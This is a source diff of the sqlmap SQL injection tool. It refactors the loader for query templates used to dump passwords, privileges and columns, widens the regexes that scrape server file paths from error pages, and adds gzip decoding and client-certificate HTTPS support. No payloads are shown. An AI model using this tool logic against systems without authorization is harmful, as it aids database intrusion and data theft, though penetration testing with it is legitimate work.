-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,15 +22,10 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
-
 from xml.sax.handler import ContentHandler
-
 from lib.core.common import sanitizeStr
 
-
 class FingerprintHandler(ContentHandler):
     """
     This class defines methods to parse and extract information from
@@ -45,7 +40,6 @@ class FingerprintHandler(ContentHandler):
         self.__techVersion = None
         self.__info        = info
 
-
     def __feedInfo(self, key, value):
         value = sanitizeStr(value)
 
@@ -61,7 +55,6 @@ class FingerprintHandler(ContentHandler):
             for v in value.split("|"):
                 self.__info[key].add(v)
 
-
     def startElement(self, name, attrs):
         if name == "regexp":
             self.__regexp = sanitizeStr(attrs.get("value"))

lib/parse/headers.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import os
 
 from xml.sax import parse
@@ -33,7 +31,6 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.parse.handler import FingerprintHandler
 
-
 def headersParser(headers):
     """
     This function calls a class that parses the input HTTP headers to

lib/parse/html.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from xml.sax import parse
@@ -34,7 +32,6 @@ from lib.core.common import sanitizeStr
 from lib.core.data import kb
 from lib.core.data import paths
 
-
 class htmlHandler(ContentHandler):
     """
     This class defines methods to parse the input HTML page to
@@ -49,7 +46,6 @@ class htmlHandler(ContentHandler):
 
         self.dbms     = None
 
-
     def startElement(self, name, attrs):
         if name == "dbms":
             self.__dbms = attrs.get("value")
@@ -62,7 +58,6 @@ class htmlHandler(ContentHandler):
                 self.dbms = self.__dbms
                 self.__match = None
 
-
 def htmlParser(page):
     """
     This function calls a class that parses the input HTML page to

lib/parse/queriesfile.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from xml.sax import parse
 from xml.sax.handler import ContentHandler
 
@@ -34,7 +32,6 @@ from lib.core.data import queries
 from lib.core.data import paths
 from lib.core.datatype import advancedDict
 
-
 class queriesHandler(ContentHandler):
     """
     This class defines methods to parse the default DBMS queries
@@ -45,7 +42,6 @@ class queriesHandler(ContentHandler):
         self.__dbms    = ''
         self.__queries = advancedDict()
 
-
     def startElement(self, name, attrs):
         if name == "dbms":
             data = sanitizeStr(attrs.get("value"))
@@ -141,15 +137,16 @@ class queriesHandler(ContentHandler):
         elif name == "inband":
             self.__inband    = sanitizeStr(attrs.get("query"))
             self.__inband2   = sanitizeStr(attrs.get("query2"))
-            self.__condition = sanitizeStr(attrs.get("condition"))
+            self.__conditionInband = sanitizeStr(attrs.get("condition"))
-            self.__condition2 = sanitizeStr(attrs.get("condition2"))
+            self.__conditionInband2 = sanitizeStr(attrs.get("condition2"))
 
         elif name == "blind":
             self.__blind  = sanitizeStr(attrs.get("query"))
             self.__blind2 = sanitizeStr(attrs.get("query2"))
             self.__count  = sanitizeStr(attrs.get("count"))
             self.__count2 = sanitizeStr(attrs.get("count2"))
-
+            self.__conditionBlind = sanitizeStr(attrs.get("condition"))
+            self.__conditionBlind2 = sanitizeStr(attrs.get("condition2"))
 
     def endElement(self, name):
         if name == "dbms":
@@ -166,7 +163,7 @@ class queriesHandler(ContentHandler):
 
         elif name == "passwords":
             self.__passwords = {}
-            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition }
+            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband }
             self.__passwords["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                            "count": self.__count, "count2": self.__count2 }
 
@@ -174,7 +171,7 @@ class queriesHandler(ContentHandler):
 
         elif name == "privileges":
             self.__privileges = {}
-            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition, "condition2": self.__condition2 }
+            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
             self.__privileges["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                            "count": self.__count, "count2": self.__count2 }
 
@@ -190,18 +187,25 @@ class queriesHandler(ContentHandler):
 
         elif name == "tables":
             self.__tables = {}
-            self.__tables["inband"] = { "query": self.__inband, "condition": self.__condition }
+            self.__tables["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
             self.__tables["blind"]  = { "query": self.__blind, "count": self.__count }
 
             self.__queries.tables = self.__tables
 
         elif name == "columns":
             self.__columns = {}
-            self.__columns["inband"] = { "query": self.__inband }
+            self.__columns["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
-            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count }
+            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "condition": self.__conditionBlind }
 
             self.__queries.columns = self.__columns
 
+        elif name == "dump_column":
+            self.__dumpColumn = {}
+            self.__dumpColumn["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
+            self.__dumpColumn["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "count2": self.__count2, "condition": self.__conditionBlind, "condition2": self.__conditionBlind2 }
+
+            self.__queries.dumpColumn = self.__dumpColumn
+
         elif name == "dump_table":
             self.__dumpTable = {}
             self.__dumpTable["inband"] = { "query": self.__inband }
@@ -209,7 +213,6 @@ class queriesHandler(ContentHandler):
 
             self.__queries.dumpTable = self.__dumpTable
 
-
 def queriesParser():
     """
     This function calls a class to parse the default DBMS queries

lib/request/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/request/basic.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,17 +22,21 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
+import gzip
-
 import os
 import re
+import StringIO
+import zlib
 
+from lib.core.common import directoryPath
+from lib.core.common import isWindowsPath
+from lib.core.common import posixToNtSlashes
+from lib.core.common import urlEncodeCookieValues
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.parse.headers import headersParser
 from lib.parse.html import htmlParser
 
-
 def forgeHeaders(cookie, ua):
     """
     Prepare HTTP Cookie and HTTP User-Agent headers to use when performing
@@ -43,6 +47,9 @@ def forgeHeaders(cookie, ua):
 
     for header, value in conf.httpHeaders:
         if cookie and header == "Cookie":
+            if conf.cookieUrlencode:
+                cookie = urlEncodeCookieValues(cookie)
+
             headers[header] = cookie
         elif ua and header == "User-Agent":
             headers[header] = ua
@@ -51,17 +58,12 @@ def forgeHeaders(cookie, ua):
 
     return headers
 
-
 def parseResponse(page, headers):
     """
     @param page: the page to parse to feed the knowledge base htmlFp
     (back-end DBMS fingerprint based upon DBMS error messages return
     through the web application) list and absFilePaths (absolute file
     paths) set.
-
-    @todo: in the future parse the page content scrolling an XML file to
-    identify the dynamic language used and, most, the absolute path,
-    like for DBMS error messages (ERRORS_XML), see above.
     """
 
     if headers:
@@ -73,11 +75,32 @@ def parseResponse(page, headers):
         # Detect injectable page absolute system path
         # NOTE: this regular expression works if the remote web application
         # is written in PHP and debug/error messages are enabled.
-        absFilePathsRegExp = ( " in <b>(.*?)</b> on line", "([\w]\:[\/\\\\]+)" )
+        absFilePathsRegExp = ( r" in <b>(?P<result>.*?)</b> on line",  r"(?:>|\s)(?P<result>[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P<result>/\w[/\w.]+)" )
 
         for absFilePathRegExp in absFilePathsRegExp:
-            absFilePaths = re.findall(absFilePathRegExp, page, re.I)
+            reobj = re.compile(absFilePathRegExp)
 
-            for absFilePath in absFilePaths:
+            for match in reobj.finditer(page):
+                absFilePath = match.group("result").strip()
+                page = page.replace(absFilePath, "")
+                if isWindowsPath(absFilePath):
+                    absFilePath = posixToNtSlashes(absFilePath)
                 if absFilePath not in kb.absFilePaths:
-                    kb.absFilePaths.add(os.path.dirname(absFilePath))
+                    kb.absFilePaths.add(absFilePath)
+                    
+
+def decodePage(page, encoding):
+    """
+    Decode gzip/deflate HTTP response
+    """
+
+    if str(encoding).lower() in ('gzip', 'x-gzip', 'deflate'):
+        if encoding == 'deflate':
+            # http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations
+            data = StringIO.StringIO(zlib.decompress(page, -15))
+        else:
+            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(page))
+
+        page = data.read()
+
+    return page

lib/request/certhandler.py

@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import sys
+import httplib
+import urllib2
+
+from lib.core.data import conf
+
+class HTTPSCertAuthHandler(urllib2.HTTPSHandler):
+    def __init__(self, key_file, cert_file):
+        urllib2.HTTPSHandler.__init__(self)
+        self.key_file = key_file
+        self.cert_file = cert_file
+
+    def https_open(self, req):
+        return self.do_open(self.getConnection, req)
+
+    def getConnection(self, host):
+        if sys.version_info >= (2,6):
+            retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file, timeout=conf.timeout)
+        else:
+            retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file)
+        return retVal

lib/request/comparison.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,15 +22,12 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.session import setMatchRatio
 
-
 def comparison(page, headers=None, getSeqMatcher=False):
     regExpResults = None
 
@@ -68,20 +65,27 @@ def comparison(page, headers=None, getSeqMatcher=False):
         else:
             return False
 
+    if conf.seqLock:
+        conf.seqLock.acquire()
+
     conf.seqMatcher.set_seq2(page)
     ratio = round(conf.seqMatcher.ratio(), 3)
 
+    if conf.seqLock:
+        conf.seqLock.release()
+
     # If the url is stable and we did not set yet the match ratio and the
     # current injected value changes the url page content
-    if conf.matchRatio == None:
+    if conf.matchRatio is None:
-        if conf.md5hash != None and ratio > 0.6 and ratio < 1:
+        if conf.md5hash is not None and ratio > 0.6 and ratio < 1:
             logger.debug("setting match ratio to %.3f" % ratio)
             conf.matchRatio = ratio
-        elif conf.md5hash == None or ( conf.md5hash != None and ratio < 0.6 ):
+
+        elif conf.md5hash is None or ( conf.md5hash is not None and ratio < 0.6 ):
             logger.debug("setting match ratio to default value 0.900")
             conf.matchRatio = 0.900
 
-        if conf.matchRatio != None:
+        if conf.matchRatio is not None:
             setMatchRatio()
 
     # If it has been requested to return the ratio and not a comparison
@@ -93,7 +97,7 @@ def comparison(page, headers=None, getSeqMatcher=False):
     # hash of the original one
     # NOTE: old implementation, it did not handle automatically the fact
     # that the url could be not stable (due to VIEWSTATE, counter, etc.)
-    #elif conf.md5hash != None:
+    #elif conf.md5hash is not None:
     #    return conf.md5hash == md5hash(page)
 
     # If the url is not stable it returns sequence matcher between the